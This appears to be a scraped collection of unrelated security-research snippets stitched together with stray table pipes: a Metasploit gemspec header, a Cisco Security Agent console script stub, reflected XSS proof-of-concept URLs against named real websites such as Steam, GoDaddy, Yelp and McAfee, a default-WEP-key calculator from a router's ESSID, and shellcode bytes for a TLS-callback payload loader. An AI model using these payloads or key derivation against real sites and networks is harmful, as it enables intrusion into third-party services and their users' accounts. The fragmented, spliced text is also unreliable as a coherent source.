# Drop this into msf3 root-dir as 'msf-rex.gemspec'. | |
# | |
# Create gem with: | |
# $ gem build msf-rex.gemspec | |
# | |
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'. | |
# We can still "require 'rex'" though. | |
$: << 'lib' |
#!/usr/bin/env python | |
# Thu 24 Jun 2010 04:20:52 AM EDT | |
import httplib | |
import mimetools | |
import StringIO | |
# Console address the script talks to. The name suggests the Cisco Security
# Agent Management Console (TODO confirm against the rest of the file); the
# value is an RFC 1918 private address, i.e. specific to the author's lab.
_csamc = '192.168.0.108'

# Hard-coded host identifier; presumably the UID of a registered agent/host in
# that same lab setup -- verify where it is used before reusing the script.
_host_uid = "C087EFAE-05A2-4A0B-9512-E05E5ED84AEB"

# Unique MIME multipart boundary string, generated once at import time by the
# Python 2 `mimetools` module (this module does not exist in Python 3).
_boundary = mimetools.choose_boundary()
https://hackalert.armorize.com/givepassword.php/%22%3E%3Cscript%3Ealert('oops')%3C/script%3E | |
http://data.mint.com/search?q=%22)})}alert('pwned');{({/*&offset=0&max=30&numpages=4 | |
https://biz.yelp.com/signup/dAecu6T1DJiDrAVZ-uIVtw/?return_url=%22%3E%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E | |
https://support.steampowered.com/register.php?password2=%22/style=%22position:fixed;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29 | |
https://idp.godaddy.com/Error.aspx?SPKey=%22;alert%281%29;// | |
http://sandboxbeta.sunbeltsoftware.com/loginlocked.aspx?FTVAR_REDIRECTURLFRM=%22%20STYLE%3d%22width:%20expression(window.x?0:(alert(/XSS/),window.x%3d1));%22 | |
http://www.webroot.com/En_US/search-results.html?q=');alert('gerry | |
http://www.mcafee.com/apps/search/threat.aspx?q=';alert(1);//&v=malware | |
http://products.verizonwireless.com/index.aspx?';alert(1)// |
#!/usr/bin/env python | |
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console. | |
Gerry <gerry@hiredhacker.com> | |
""" | |
import os | |
import sys | |
import struct | |
import pefile | |
from itertools import takewhile |
# Calculate the lower 6 hex digits of the WEP key (the sample output below is
# six hex digits, i.e. three bytes); the upper 4 come from the MAC address of
# the router (1801 or 1F90).
def get_key(essid):
    """Return the ESSID-derived part of the default WEP key as a hex string.

    Each character of *essid* is read as a base-36 digit (0-9, a-z, case
    insensitive) and weighted by 36 raised to its position, so the first
    character is the least significant digit. The total is returned in the
    form produced by ``hex()``, e.g. ``get_key("E3X12")`` gives ``0x349fca``.

    ``int(..., 36)`` raises ValueError for any character that is not a valid
    base-36 digit. An empty ESSID yields ``0x0``.

    Defensive note: the only input is the ESSID, which the device broadcasts,
    so the key material computed here is not secret. A factory key of this
    kind should be replaced rather than relied on.
    """
    total = 0
    for position, digit in enumerate(essid):
        # Position 0 carries weight 36**0, position 1 carries 36**1, ...
        total += int(digit, 36) * 36 ** position
    return hex(total)
# >>> print get_key("E3X12") | |
# 0x349fca |
offset = 0x1000 - len(scode) - 32 | |
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
tls_header += "\x5E" # POP ESI | |
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
tls_header += "\x57" # PUSH EDI | |
tls_header += "\xFC" # CLD | |
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] |